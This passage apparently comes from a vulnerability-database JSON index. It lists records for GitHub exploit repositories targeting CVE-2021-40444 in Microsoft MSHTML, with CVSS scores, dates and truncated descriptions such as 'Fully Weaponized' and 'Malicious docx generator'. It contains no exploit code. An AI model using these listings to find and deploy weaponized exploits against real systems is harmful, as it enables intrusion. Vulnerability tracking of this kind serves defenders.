"impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:21:49", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:49:48", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:48", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:09", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# 